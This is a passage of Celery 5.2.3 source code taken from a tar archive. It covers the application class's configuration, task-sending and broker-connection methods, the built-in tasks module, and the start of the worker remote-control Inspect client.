if silent: return False raise ImproperlyConfigured( ERR_ENVVAR_NOT_SET.strip().format(variable_name)) return self.config_from_object(module_name, silent=silent, force=force) def config_from_cmdline(self, argv, namespace='celery'): self._conf.update( self.loader.cmdline_config_parser(argv, namespace) ) def setup_security(self, allowed_serializers=None, key=None, cert=None, store=None, digest=DEFAULT_SECURITY_DIGEST, serializer='json'): """Setup the message-signing serializer. This will affect all application instances (a global operation). Disables untrusted serializers and if configured to use the ``auth`` serializer will register the ``auth`` serializer with the provided settings into the Kombu serializer registry. Arguments: allowed_serializers (Set[str]): List of serializer names, or content_types that should be exempt from being disabled. key (str): Name of private key file to use. Defaults to the :setting:`security_key` setting. cert (str): Name of certificate file to use. Defaults to the :setting:`security_certificate` setting. store (str): Directory containing certificates. Defaults to the :setting:`security_cert_store` setting. digest (str): Digest algorithm used when signing messages. Default is ``sha256``. serializer (str): Serializer used to encode messages after they've been signed. See :setting:`task_serializer` for the serializers supported. Default is ``json``. """ from celery.security import setup_security return setup_security(allowed_serializers, key, cert, store, digest, serializer, app=self) def autodiscover_tasks(self, packages=None, related_name='tasks', force=False): """Auto-discover task modules. Searches a list of packages for a "tasks.py" module (or use related_name argument). If the name is empty, this will be delegated to fix-ups (e.g., Django). For example if you have a directory layout like this: .. code-block:: text foo/__init__.py tasks.py models.py bar/__init__.py tasks.py models.py baz/__init__.py models.py Then calling ``app.autodiscover_tasks(['foo', 'bar', 'baz'])`` will result in the modules ``foo.tasks`` and ``bar.tasks`` being imported. Arguments: packages (List[str]): List of packages to search. This argument may also be a callable, in which case the value returned is used (for lazy evaluation). 
related_name (Optional[str]): The name of the module to find. Defaults to "tasks": meaning "look for 'module.tasks' for every module in ``packages``.". If ``None`` will only try to import the package, i.e. "look for 'module'". force (bool): By default this call is lazy so that the actual auto-discovery won't happen until an application imports the default modules. Forcing will cause the auto-discovery to happen immediately. """ if force: return self._autodiscover_tasks(packages, related_name) signals.import_modules.connect(starpromise( self._autodiscover_tasks, packages, related_name, ), weak=False, sender=self) def _autodiscover_tasks(self, packages, related_name, **kwargs): if packages: return self._autodiscover_tasks_from_names(packages, related_name) return self._autodiscover_tasks_from_fixups(related_name) def _autodiscover_tasks_from_names(self, packages, related_name): # packages argument can be lazy return self.loader.autodiscover_tasks( packages() if callable(packages) else packages, related_name, ) def _autodiscover_tasks_from_fixups(self, related_name): return self._autodiscover_tasks_from_names([ pkg for fixup in self._fixups if hasattr(fixup, 'autodiscover_tasks') for pkg in fixup.autodiscover_tasks() ], related_name=related_name) def send_task(self, name, args=None, kwargs=None, countdown=None, eta=None, task_id=None, producer=None, connection=None, router=None, result_cls=None, expires=None, publisher=None, link=None, link_error=None, add_to_parent=True, group_id=None, group_index=None, retries=0, chord=None, reply_to=None, time_limit=None, soft_time_limit=None, root_id=None, parent_id=None, route_name=None, shadow=None, chain=None, task_type=None, **options): """Send task by name. Supports the same arguments as :meth:`@-Task.apply_async`. Arguments: name (str): Name of task to call (e.g., `"tasks.add"`). result_cls (AsyncResult): Specify custom result class. """ parent = have_parent = None amqp = self.amqp task_id = task_id or uuid() producer = producer or publisher # XXX compat router = router or amqp.router conf = self.conf if conf.task_always_eager: # pragma: no cover warnings.warn(AlwaysEagerIgnored( 'task_always_eager has no effect on send_task', ), stacklevel=2) ignore_result = options.pop('ignore_result', False) options = router.route( options, route_name or name, args, kwargs, task_type) if expires is not None: if isinstance(expires, datetime): expires_s = (maybe_make_aware(expires) - self.now()).total_seconds() else: expires_s = expires if expires_s < 0: logger.warning( f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n" "We assume this is intended and so we have set the " "expiration date to 0 instead.\n" "According to RabbitMQ's documentation:\n" "\"Setting the TTL to 0 causes messages to be expired upon " "reaching a queue unless they can be delivered to a " "consumer immediately.\"\n" "If this was unintended, please check the code which " "published this task." 
) expires_s = 0 options["expiration"] = expires_s if not root_id or not parent_id: parent = self.current_worker_task if parent: if not root_id: root_id = parent.request.root_id or parent.request.id if not parent_id: parent_id = parent.request.id if conf.task_inherit_parent_priority: options.setdefault('priority', parent.request.delivery_info.get('priority')) message = amqp.create_task_message( task_id, name, args, kwargs, countdown, eta, group_id, group_index, expires, retries, chord, maybe_list(link), maybe_list(link_error), reply_to or self.thread_oid, time_limit, soft_time_limit, self.conf.task_send_sent_event, root_id, parent_id, shadow, chain, ignore_result=ignore_result, argsrepr=options.get('argsrepr'), kwargsrepr=options.get('kwargsrepr'), ) if connection: producer = amqp.Producer(connection, auto_declare=False) with self.producer_or_acquire(producer) as P: with P.connection._reraise_as_library_errors(): if not ignore_result: self.backend.on_task_call(P, task_id) amqp.send_task_message(P, name, message, **options) result = (result_cls or self.AsyncResult)(task_id) # We avoid using the constructor since a custom result class # can be used, in which case the constructor may still use # the old signature. result.ignored = ignore_result if add_to_parent: if not have_parent: parent, have_parent = self.current_worker_task, True if parent: parent.add_trail(result) return result def connection_for_read(self, url=None, **kwargs): """Establish connection used for consuming. See Also: :meth:`connection` for supported arguments. """ return self._connection(url or self.conf.broker_read_url, **kwargs) def connection_for_write(self, url=None, **kwargs): """Establish connection used for producing. See Also: :meth:`connection` for supported arguments. """ return self._connection(url or self.conf.broker_write_url, **kwargs) def connection(self, hostname=None, userid=None, password=None, virtual_host=None, port=None, ssl=None, connect_timeout=None, transport=None, transport_options=None, heartbeat=None, login_method=None, failover_strategy=None, **kwargs): """Establish a connection to the message broker. Please use :meth:`connection_for_read` and :meth:`connection_for_write` instead, to convey the intent of use for this connection. Arguments: url: Either the URL or the hostname of the broker to use. hostname (str): URL, Hostname/IP-address of the broker. If a URL is used, then the other argument below will be taken from the URL instead. userid (str): Username to authenticate as. password (str): Password to authenticate with virtual_host (str): Virtual host to use (domain). port (int): Port to connect to. ssl (bool, Dict): Defaults to the :setting:`broker_use_ssl` setting. transport (str): defaults to the :setting:`broker_transport` setting. transport_options (Dict): Dictionary of transport specific options. heartbeat (int): AMQP Heartbeat in seconds (``pyamqp`` only). login_method (str): Custom login method to use (AMQP only). failover_strategy (str, Callable): Custom failover strategy. **kwargs: Additional arguments to :class:`kombu.Connection`. Returns: kombu.Connection: the lazy connection instance. 
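        Example:
            Sketch only, assuming ``app`` is an existing :class:`Celery`
            instance; new code should prefer the read/write variants:

            >>> with app.connection_for_write() as conn:
            ...     conn.ensure_connection()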
""" return self.connection_for_write( hostname or self.conf.broker_write_url, userid=userid, password=password, virtual_host=virtual_host, port=port, ssl=ssl, connect_timeout=connect_timeout, transport=transport, transport_options=transport_options, heartbeat=heartbeat, login_method=login_method, failover_strategy=failover_strategy, **kwargs ) def _connection(self, url, userid=None, password=None, virtual_host=None, port=None, ssl=None, connect_timeout=None, transport=None, transport_options=None, heartbeat=None, login_method=None, failover_strategy=None, **kwargs): conf = self.conf return self.amqp.Connection( url, userid or conf.broker_user, password or conf.broker_password, virtual_host or conf.broker_vhost, port or conf.broker_port, transport=transport or conf.broker_transport, ssl=self.either('broker_use_ssl', ssl), heartbeat=heartbeat, login_method=login_method or conf.broker_login_method, failover_strategy=( failover_strategy or conf.broker_failover_strategy ), transport_options=dict( conf.broker_transport_options, **transport_options or {} ), connect_timeout=self.either( 'broker_connection_timeout', connect_timeout ), ) broker_connection = connection def _acquire_connection(self, pool=True): """Helper for :meth:`connection_or_acquire`.""" if pool: return self.pool.acquire(block=True) return self.connection_for_write() def connection_or_acquire(self, connection=None, pool=True, *_, **__): """Context used to acquire a connection from the pool. For use within a :keyword:`with` statement to get a connection from the pool if one is not already provided. Arguments: connection (kombu.Connection): If not provided, a connection will be acquired from the connection pool. """ return FallbackContext(connection, self._acquire_connection, pool=pool) default_connection = connection_or_acquire # XXX compat def producer_or_acquire(self, producer=None): """Context used to acquire a producer from the pool. For use within a :keyword:`with` statement to get a producer from the pool if one is not already provided Arguments: producer (kombu.Producer): If not provided, a producer will be acquired from the producer pool. """ return FallbackContext( producer, self.producer_pool.acquire, block=True, ) default_producer = producer_or_acquire # XXX compat def prepare_config(self, c): """Prepare configuration before it is merged with the defaults.""" return find_deprecated_settings(c) def now(self): """Return the current time and date as a datetime.""" now_in_utc = to_utc(datetime.utcnow()) return now_in_utc.astimezone(self.timezone) def select_queues(self, queues=None): """Select subset of queues. Arguments: queues (Sequence[str]): a list of queue names to keep. """ return self.amqp.queues.select(queues) def either(self, default_key, *defaults): """Get key from configuration or use default values. Fallback to the value of a configuration key if none of the `*values` are true. """ return first(None, [ first(None, defaults), starpromise(self.conf.get, default_key), ]) def bugreport(self): """Return information useful in bug reports.""" return bugreport(self) def _get_backend(self): backend, url = backends.by_url( self.backend_cls or self.conf.result_backend, self.loader) return backend(app=self, url=url) def _finalize_pending_conf(self): """Get config value by key and finalize loading the configuration. Note: This is used by PendingConfiguration: as soon as you access a key the configuration is read. 
""" conf = self._conf = self._load_config() return conf def _load_config(self): if isinstance(self.on_configure, Signal): self.on_configure.send(sender=self) else: # used to be a method pre 4.0 self.on_configure() if self._config_source: self.loader.config_from_object(self._config_source) self.configured = True settings = detect_settings( self.prepare_config(self.loader.conf), self._preconf, ignore_keys=self._preconf_set_by_auto, prefix=self.namespace, ) if self._conf is not None: # replace in place, as someone may have referenced app.conf, # done some changes, accessed a key, and then try to make more # changes to the reference and not the finalized value. self._conf.swap_with(settings) else: self._conf = settings # load lazy config dict initializers. pending_def = self._pending_defaults while pending_def: self._conf.add_defaults(maybe_evaluate(pending_def.popleft()())) # load lazy periodic tasks pending_beat = self._pending_periodic_tasks while pending_beat: self._add_periodic_task(*pending_beat.popleft()) self.on_after_configure.send(sender=self, source=self._conf) return self._conf def _after_fork(self): self._pool = None try: self.__dict__['amqp']._producer_pool = None except (AttributeError, KeyError): pass self.on_after_fork.send(sender=self) def signature(self, *args, **kwargs): """Return a new :class:`~celery.Signature` bound to this app.""" kwargs['app'] = self return self._canvas.signature(*args, **kwargs) def add_periodic_task(self, schedule, sig, args=(), kwargs=(), name=None, **opts): key, entry = self._sig_to_periodic_task_entry( schedule, sig, args, kwargs, name, **opts) if self.configured: self._add_periodic_task(key, entry) else: self._pending_periodic_tasks.append((key, entry)) return key def _sig_to_periodic_task_entry(self, schedule, sig, args=(), kwargs=None, name=None, **opts): kwargs = {} if not kwargs else kwargs sig = (sig.clone(args, kwargs) if isinstance(sig, abstract.CallableSignature) else self.signature(sig.name, args, kwargs)) return name or repr(sig), { 'schedule': schedule, 'task': sig.name, 'args': sig.args, 'kwargs': sig.kwargs, 'options': dict(sig.options, **opts), } def _add_periodic_task(self, key, entry): self._conf.beat_schedule[key] = entry def create_task_cls(self): """Create a base task class bound to this app.""" return self.subclass_with_self( self.task_cls, name='Task', attribute='_app', keep_reduce=True, abstract=True, ) def subclass_with_self(self, Class, name=None, attribute='app', reverse=None, keep_reduce=False, **kw): """Subclass an app-compatible class. App-compatible means that the class has a class attribute that provides the default app it should use, for example: ``class Foo: app = None``. Arguments: Class (type): The app-compatible class to subclass. name (str): Custom name for the target class. attribute (str): Name of the attribute holding the app, Default is 'app'. reverse (str): Reverse path to this object used for pickling purposes. For example, to get ``app.AsyncResult``, use ``"AsyncResult"``. keep_reduce (bool): If enabled a custom ``__reduce__`` implementation won't be provided. 
""" Class = symbol_by_name(Class) reverse = reverse if reverse else Class.__name__ def __reduce__(self): return _unpickle_appattr, (reverse, self.__reduce_args__()) attrs = dict( {attribute: self}, __module__=Class.__module__, __doc__=Class.__doc__, **kw) if not keep_reduce: attrs['__reduce__'] = __reduce__ return type(name or Class.__name__, (Class,), attrs) def _rgetattr(self, path): return attrgetter(path)(self) def __enter__(self): return self def __exit__(self, *exc_info): self.close() def __repr__(self): return f'<{type(self).__name__} {appstr(self)}>' def __reduce__(self): if self._using_v1_reduce: return self.__reduce_v1__() return (_unpickle_app_v2, (self.__class__, self.__reduce_keys__())) def __reduce_v1__(self): # Reduce only pickles the configuration changes, # so the default configuration doesn't have to be passed # between processes. return ( _unpickle_app, (self.__class__, self.Pickler) + self.__reduce_args__(), ) def __reduce_keys__(self): """Keyword arguments used to reconstruct the object when unpickling.""" return { 'main': self.main, 'changes': self._conf.changes if self.configured else self._preconf, 'loader': self.loader_cls, 'backend': self.backend_cls, 'amqp': self.amqp_cls, 'events': self.events_cls, 'log': self.log_cls, 'control': self.control_cls, 'fixups': self.fixups, 'config_source': self._config_source, 'task_cls': self.task_cls, 'namespace': self.namespace, } def __reduce_args__(self): """Deprecated method, please use :meth:`__reduce_keys__` instead.""" return (self.main, self._conf.changes if self.configured else {}, self.loader_cls, self.backend_cls, self.amqp_cls, self.events_cls, self.log_cls, self.control_cls, False, self._config_source) @cached_property def Worker(self): """Worker application. See Also: :class:`~@Worker`. """ return self.subclass_with_self('celery.apps.worker:Worker') @cached_property def WorkController(self, **kwargs): """Embeddable worker. See Also: :class:`~@WorkController`. """ return self.subclass_with_self('celery.worker:WorkController') @cached_property def Beat(self, **kwargs): """:program:`celery beat` scheduler application. See Also: :class:`~@Beat`. """ return self.subclass_with_self('celery.apps.beat:Beat') @cached_property def Task(self): """Base task class for this app.""" return self.create_task_cls() @cached_property def annotations(self): return prepare_annotations(self.conf.task_annotations) @cached_property def AsyncResult(self): """Create new result instance. See Also: :class:`celery.result.AsyncResult`. """ return self.subclass_with_self('celery.result:AsyncResult') @cached_property def ResultSet(self): return self.subclass_with_self('celery.result:ResultSet') @cached_property def GroupResult(self): """Create new group result instance. See Also: :class:`celery.result.GroupResult`. """ return self.subclass_with_self('celery.result:GroupResult') @property def pool(self): """Broker connection pool: :class:`~@pool`. Note: This attribute is not related to the workers concurrency pool. """ if self._pool is None: self._ensure_after_fork() limit = self.conf.broker_pool_limit pools.set_limit(limit) self._pool = pools.connections[self.connection_for_write()] return self._pool @property def current_task(self): """Instance of task being executed, or :const:`None`.""" return _task_stack.top @property def current_worker_task(self): """The task currently being executed by a worker or :const:`None`. Differs from :data:`current_task` in that it's not affected by tasks calling other tasks directly, or eagerly. 
""" return get_current_worker_task() @cached_property def oid(self): """Universally unique identifier for this app.""" # since 4.0: thread.get_ident() is not included when # generating the process id. This is due to how the RPC # backend now dedicates a single thread to receive results, # which would not work if each thread has a separate id. return oid_from(self, threads=False) @property def thread_oid(self): """Per-thread unique identifier for this app.""" try: return self._local.oid except AttributeError: self._local.oid = new_oid = oid_from(self, threads=True) return new_oid @cached_property def amqp(self): """AMQP related functionality: :class:`~@amqp`.""" return instantiate(self.amqp_cls, app=self) @property def backend(self): """Current backend instance.""" try: return self._local.backend except AttributeError: self._local.backend = new_backend = self._get_backend() return new_backend @property def conf(self): """Current configuration.""" if self._conf is None: self._conf = self._load_config() return self._conf @conf.setter def conf(self, d): self._conf = d @cached_property def control(self): """Remote control: :class:`~@control`.""" return instantiate(self.control_cls, app=self) @cached_property def events(self): """Consuming and sending events: :class:`~@events`.""" return instantiate(self.events_cls, app=self) @cached_property def loader(self): """Current loader instance.""" return get_loader_cls(self.loader_cls)(app=self) @cached_property def log(self): """Logging: :class:`~@log`.""" return instantiate(self.log_cls, app=self) @cached_property def _canvas(self): from celery import canvas return canvas @cached_property def tasks(self): """Task registry. Warning: Accessing this attribute will also auto-finalize the app. """ self.finalize(auto=True) return self._tasks @property def producer_pool(self): return self.amqp.producer_pool def uses_utc_timezone(self): """Check if the application uses the UTC timezone.""" return self.timezone == timezone.utc @cached_property def timezone(self): """Current timezone for this app. This is a cached property taking the time zone from the :setting:`timezone` setting. """ conf = self.conf if not conf.timezone: if conf.enable_utc: return timezone.utc else: return timezone.local return timezone.get_timezone(conf.timezone) App = Celery # XXX compat ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/builtins.py0000664000175000017500000001502100000000000017142 0ustar00asifasif00000000000000"""Built-in Tasks. The built-in tasks are always available in all app instances. """ from celery._state import connect_on_app_finalize from celery.utils.log import get_logger __all__ = () logger = get_logger(__name__) @connect_on_app_finalize def add_backend_cleanup_task(app): """Task used to clean up expired results. If the configured backend requires periodic cleanup this task is also automatically configured to run every day at 4am (requires :program:`celery beat` to be running). 
""" @app.task(name='celery.backend_cleanup', shared=False, lazy=False) def backend_cleanup(): app.backend.cleanup() return backend_cleanup @connect_on_app_finalize def add_accumulate_task(app): """Task used by Task.replace when replacing task with group.""" @app.task(bind=True, name='celery.accumulate', shared=False, lazy=False) def accumulate(self, *args, **kwargs): index = kwargs.get('index') return args[index] if index is not None else args return accumulate @connect_on_app_finalize def add_unlock_chord_task(app): """Task used by result backends without native chord support. Will joins chord by creating a task chain polling the header for completion. """ from celery.canvas import maybe_signature from celery.exceptions import ChordError from celery.result import allow_join_result, result_from_tuple @app.task(name='celery.chord_unlock', max_retries=None, shared=False, default_retry_delay=app.conf.result_chord_retry_interval, ignore_result=True, lazy=False, bind=True) def unlock_chord(self, group_id, callback, interval=None, max_retries=None, result=None, Result=app.AsyncResult, GroupResult=app.GroupResult, result_from_tuple=result_from_tuple, **kwargs): if interval is None: interval = self.default_retry_delay # check if the task group is ready, and if so apply the callback. callback = maybe_signature(callback, app) deps = GroupResult( group_id, [result_from_tuple(r, app=app) for r in result], app=app, ) j = deps.join_native if deps.supports_native_join else deps.join try: ready = deps.ready() except Exception as exc: raise self.retry( exc=exc, countdown=interval, max_retries=max_retries, ) else: if not ready: raise self.retry(countdown=interval, max_retries=max_retries) callback = maybe_signature(callback, app=app) try: with allow_join_result(): ret = j( timeout=app.conf.result_chord_join_timeout, propagate=True, ) except Exception as exc: # pylint: disable=broad-except try: culprit = next(deps._failed_join_report()) reason = f'Dependency {culprit.id} raised {exc!r}' except StopIteration: reason = repr(exc) logger.exception('Chord %r raised: %r', group_id, exc) app.backend.chord_error_from_stack(callback, ChordError(reason)) else: try: callback.delay(ret) except Exception as exc: # pylint: disable=broad-except logger.exception('Chord %r raised: %r', group_id, exc) app.backend.chord_error_from_stack( callback, exc=ChordError(f'Callback error: {exc!r}'), ) return unlock_chord @connect_on_app_finalize def add_map_task(app): from celery.canvas import signature @app.task(name='celery.map', shared=False, lazy=False) def xmap(task, it): task = signature(task, app=app).type return [task(item) for item in it] return xmap @connect_on_app_finalize def add_starmap_task(app): from celery.canvas import signature @app.task(name='celery.starmap', shared=False, lazy=False) def xstarmap(task, it): task = signature(task, app=app).type return [task(*item) for item in it] return xstarmap @connect_on_app_finalize def add_chunk_task(app): from celery.canvas import chunks as _chunks @app.task(name='celery.chunks', shared=False, lazy=False) def chunks(task, it, n): return _chunks.apply_chunks(task, it, n) return chunks @connect_on_app_finalize def add_group_task(app): """No longer used, but here for backwards compatibility.""" from celery.canvas import maybe_signature from celery.result import result_from_tuple @app.task(name='celery.group', bind=True, shared=False, lazy=False) def group(self, tasks, result, group_id, partial_args, add_to_parent=True): app = self.app result = result_from_tuple(result, app) # any 
partial args are added to all tasks in the group taskit = (maybe_signature(task, app=app).clone(partial_args) for i, task in enumerate(tasks)) with app.producer_or_acquire() as producer: [stask.apply_async(group_id=group_id, producer=producer, add_to_parent=False) for stask in taskit] parent = app.current_worker_task if add_to_parent and parent: parent.add_trail(result) return result return group @connect_on_app_finalize def add_chain_task(app): """No longer used, but here for backwards compatibility.""" @app.task(name='celery.chain', shared=False, lazy=False) def chain(*args, **kwargs): raise NotImplementedError('chain is not a real task') return chain @connect_on_app_finalize def add_chord_task(app): """No longer used, but here for backwards compatibility.""" from celery import chord as _chord from celery import group from celery.canvas import maybe_signature @app.task(name='celery.chord', bind=True, ignore_result=False, shared=False, lazy=False) def chord(self, header, body, partial_args=(), interval=None, countdown=1, max_retries=None, eager=False, **kwargs): app = self.app # - convert back to group if serialized tasks = header.tasks if isinstance(header, group) else header header = group([ maybe_signature(s, app=app) for s in tasks ], app=self.app) body = maybe_signature(body, app=app) ch = _chord(header, body) return ch.run(header, body, partial_args, app, interval, countdown, max_retries, **kwargs) return chord ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/app/control.py0000664000175000017500000006630100000000000017000 0ustar00asifasif00000000000000"""Worker Remote Control Client. Client for worker remote control commands. Server implementation is in :mod:`celery.worker.control`. There are two types of remote control commands: * Inspect commands: Does not have side effects, will usually just return some value found in the worker, like the list of currently registered tasks, the list of active tasks, etc. Commands are accessible via :class:`Inspect` class. * Control commands: Performs side effects, like adding a new queue to consume from. Commands are accessible via :class:`Control` class. """ import warnings from billiard.common import TERM_SIGNAME from kombu.matcher import match from kombu.pidbox import Mailbox from kombu.utils.compat import register_after_fork from kombu.utils.functional import lazy from kombu.utils.objects import cached_property from celery.exceptions import DuplicateNodenameWarning from celery.utils.log import get_logger from celery.utils.text import pluralize __all__ = ('Inspect', 'Control', 'flatten_reply') logger = get_logger(__name__) W_DUPNODE = """\ Received multiple replies from node {0}: {1}. Please make sure you give each node a unique nodename using the celery worker `-n` option.\ """ def flatten_reply(reply): """Flatten node replies. 
Convert from a list of replies in this format:: [{'a@example.com': reply}, {'b@example.com': reply}] into this format:: {'a@example.com': reply, 'b@example.com': reply} """ nodes, dupes = {}, set() for item in reply: [dupes.add(name) for name in item if name in nodes] nodes.update(item) if dupes: warnings.warn(DuplicateNodenameWarning( W_DUPNODE.format( pluralize(len(dupes), 'name'), ', '.join(sorted(dupes)), ), )) return nodes def _after_fork_cleanup_control(control): try: control._after_fork() except Exception as exc: # pylint: disable=broad-except logger.info('after fork raised exception: %r', exc, exc_info=1) class Inspect: """API for inspecting workers. This class provides proxy for accessing Inspect API of workers. The API is defined in :py:mod:`celery.worker.control` """ app = None def __init__(self, destination=None, timeout=1.0, callback=None, connection=None, app=None, limit=None, pattern=None, matcher=None): self.app = app or self.app self.destination = destination self.timeout = timeout self.callback = callback self.connection = connection self.limit = limit self.pattern = pattern self.matcher = matcher def _prepare(self, reply): if reply: by_node = flatten_reply(reply) if (self.destination and not isinstance(self.destination, (list, tuple))): return by_node.get(self.destination) if self.pattern: pattern = self.pattern matcher = self.matcher return {node: reply for node, reply in by_node.items() if match(node, pattern, matcher)} return by_node def _request(self, command, **kwargs): return self._prepare(self.app.control.broadcast( command, arguments=kwargs, destination=self.destination, callback=self.callback, connection=self.connection, limit=self.limit, timeout=self.timeout, reply=True, pattern=self.pattern, matcher=self.matcher, )) def report(self): """Return human readable report for each worker. Returns: Dict: Dictionary ``{HOSTNAME: {'ok': REPORT_STRING}}``. """ return self._request('report') def clock(self): """Get the Clock value on workers. >>> app.control.inspect().clock() {'celery@node1': {'clock': 12}} Returns: Dict: Dictionary ``{HOSTNAME: CLOCK_VALUE}``. """ return self._request('clock') def active(self, safe=None): """Return list of tasks currently executed by workers. Arguments: safe (Boolean): Set to True to disable deserialization. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. See Also: For ``TASK_INFO`` details see :func:`query_task` return value. """ return self._request('active', safe=safe) def scheduled(self, safe=None): """Return list of scheduled tasks with details. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_SCHEDULED_INFO,...]}``. Here is the list of ``TASK_SCHEDULED_INFO`` fields: * ``eta`` - scheduled time for task execution as string in ISO 8601 format * ``priority`` - priority of the task * ``request`` - field containing ``TASK_INFO`` value. See Also: For more details about ``TASK_INFO`` see :func:`query_task` return value. """ return self._request('scheduled') def reserved(self, safe=None): """Return list of currently reserved tasks, not including scheduled/active. Returns: Dict: Dictionary ``{HOSTNAME: [TASK_INFO,...]}``. See Also: For ``TASK_INFO`` details see :func:`query_task` return value. """ return self._request('reserved') def stats(self): """Return statistics of worker. Returns: Dict: Dictionary ``{HOSTNAME: STAT_INFO}``. Here is the list of ``STAT_INFO`` fields: * ``broker`` - Section for broker information. * ``connect_timeout`` - Timeout in seconds (int/float) for establishing a new connection. 
* ``heartbeat`` - Current heartbeat value (set by client). * ``hostname`` - Node name of the remote broker. * ``insist`` - No longer used. * ``login_method`` - Login method used to connect to the broker. * ``port`` - Port of the remote broker. * ``ssl`` - SSL enabled/disabled. * ``transport`` - Name of transport used (e.g., amqp or redis) * ``transport_options`` - Options passed to transport. * ``uri_prefix`` - Some transports expects the host name to be a URL. E.g. ``redis+socket:///tmp/redis.sock``. In this example the URI-prefix will be redis. * ``userid`` - User id used to connect to the broker with. * ``virtual_host`` - Virtual host used. * ``clock`` - Value of the workers logical clock. This is a positive integer and should be increasing every time you receive statistics. * ``uptime`` - Numbers of seconds since the worker controller was started * ``pid`` - Process id of the worker instance (Main process). * ``pool`` - Pool-specific section. * ``max-concurrency`` - Max number of processes/threads/green threads. * ``max-tasks-per-child`` - Max number of tasks a thread may execute before being recycled. * ``processes`` - List of PIDs (or thread-id’s). * ``put-guarded-by-semaphore`` - Internal * ``timeouts`` - Default values for time limits. * ``writes`` - Specific to the prefork pool, this shows the distribution of writes to each process in the pool when using async I/O. * ``prefetch_count`` - Current prefetch count value for the task consumer. * ``rusage`` - System usage statistics. The fields available may be different on your platform. From :manpage:`getrusage(2)`: * ``stime`` - Time spent in operating system code on behalf of this process. * ``utime`` - Time spent executing user instructions. * ``maxrss`` - The maximum resident size used by this process (in kilobytes). * ``idrss`` - Amount of non-shared memory used for data (in kilobytes times ticks of execution) * ``isrss`` - Amount of non-shared memory used for stack space (in kilobytes times ticks of execution) * ``ixrss`` - Amount of memory shared with other processes (in kilobytes times ticks of execution). * ``inblock`` - Number of times the file system had to read from the disk on behalf of this process. * ``oublock`` - Number of times the file system has to write to disk on behalf of this process. * ``majflt`` - Number of page faults that were serviced by doing I/O. * ``minflt`` - Number of page faults that were serviced without doing I/O. * ``msgrcv`` - Number of IPC messages received. * ``msgsnd`` - Number of IPC messages sent. * ``nvcsw`` - Number of times this process voluntarily invoked a context switch. * ``nivcsw`` - Number of times an involuntary context switch took place. * ``nsignals`` - Number of signals received. * ``nswap`` - The number of times this process was swapped entirely out of memory. * ``total`` - Map of task names and the total number of tasks with that type the worker has accepted since start-up. """ return self._request('stats') def revoked(self): """Return list of revoked tasks. >>> app.control.inspect().revoked() {'celery@node1': ['16f527de-1c72-47a6-b477-c472b92fef7a']} Returns: Dict: Dictionary ``{HOSTNAME: [TASK_ID, ...]}``. """ return self._request('revoked') def registered(self, *taskinfoitems): """Return all registered tasks per worker. 
>>> app.control.inspect().registered() {'celery@node1': ['task1', 'task1']} >>> app.control.inspect().registered('serializer', 'max_retries') {'celery@node1': ['task_foo [serializer=json max_retries=3]', 'tasb_bar [serializer=json max_retries=3]']} Arguments: taskinfoitems (Sequence[str]): List of :class:`~celery.app.task.Task` attributes to include. Returns: Dict: Dictionary ``{HOSTNAME: [TASK1_INFO, ...]}``. """ return self._request('registered', taskinfoitems=taskinfoitems) registered_tasks = registered def ping(self, destination=None): """Ping all (or specific) workers. >>> app.control.inspect().ping() {'celery@node1': {'ok': 'pong'}, 'celery@node2': {'ok': 'pong'}} >>> app.control.inspect().ping(destination=['celery@node1']) {'celery@node1': {'ok': 'pong'}} Arguments: destination (List): If set, a list of the hosts to send the command to, when empty broadcast to all workers. Returns: Dict: Dictionary ``{HOSTNAME: {'ok': 'pong'}}``. See Also: :meth:`broadcast` for supported keyword arguments. """ if destination: self.destination = destination return self._request('ping') def active_queues(self): """Return information about queues from which worker consumes tasks. Returns: Dict: Dictionary ``{HOSTNAME: [QUEUE_INFO, QUEUE_INFO,...]}``. Here is the list of ``QUEUE_INFO`` fields: * ``name`` * ``exchange`` * ``name`` * ``type`` * ``arguments`` * ``durable`` * ``passive`` * ``auto_delete`` * ``delivery_mode`` * ``no_declare`` * ``routing_key`` * ``queue_arguments`` * ``binding_arguments`` * ``consumer_arguments`` * ``durable`` * ``exclusive`` * ``auto_delete`` * ``no_ack`` * ``alias`` * ``bindings`` * ``no_declare`` * ``expires`` * ``message_ttl`` * ``max_length`` * ``max_length_bytes`` * ``max_priority`` See Also: See the RabbitMQ/AMQP documentation for more details about ``queue_info`` fields. Note: The ``queue_info`` fields are RabbitMQ/AMQP oriented. Not all fields applies for other transports. """ return self._request('active_queues') def query_task(self, *ids): """Return detail of tasks currently executed by workers. Arguments: *ids (str): IDs of tasks to be queried. Returns: Dict: Dictionary ``{HOSTNAME: {TASK_ID: [STATE, TASK_INFO]}}``. Here is the list of ``TASK_INFO`` fields: * ``id`` - ID of the task * ``name`` - Name of the task * ``args`` - Positinal arguments passed to the task * ``kwargs`` - Keyword arguments passed to the task * ``type`` - Type of the task * ``hostname`` - Hostname of the worker processing the task * ``time_start`` - Time of processing start * ``acknowledged`` - True when task was acknowledged to broker * ``delivery_info`` - Dictionary containing delivery information * ``exchange`` - Name of exchange where task was published * ``routing_key`` - Routing key used when task was published * ``priority`` - Priority used when task was published * ``redelivered`` - True if the task was redelivered * ``worker_pid`` - PID of worker processin the task """ # signature used be unary: query_task(ids=[id1, id2]) # we need this to preserve backward compatibility. if len(ids) == 1 and isinstance(ids[0], (list, tuple)): ids = ids[0] return self._request('query_task', ids=ids) def conf(self, with_defaults=False): """Return configuration of each worker. Arguments: with_defaults (bool): if set to True, method returns also configuration options with default values. Returns: Dict: Dictionary ``{HOSTNAME: WORKER_CONFIGURATION}``. See Also: ``WORKER_CONFIGURATION`` is a dictionary containing current configuration options. See :ref:`configuration` for possible values. 
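A short sketch; the node name is hypothetical and a reply requires a running worker reachable through the broker::

    >>> i = app.control.inspect(destination=['celery@node1'], timeout=2.0)
    >>> replies = i.conf(with_defaults=True)   # None if no worker replied in time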
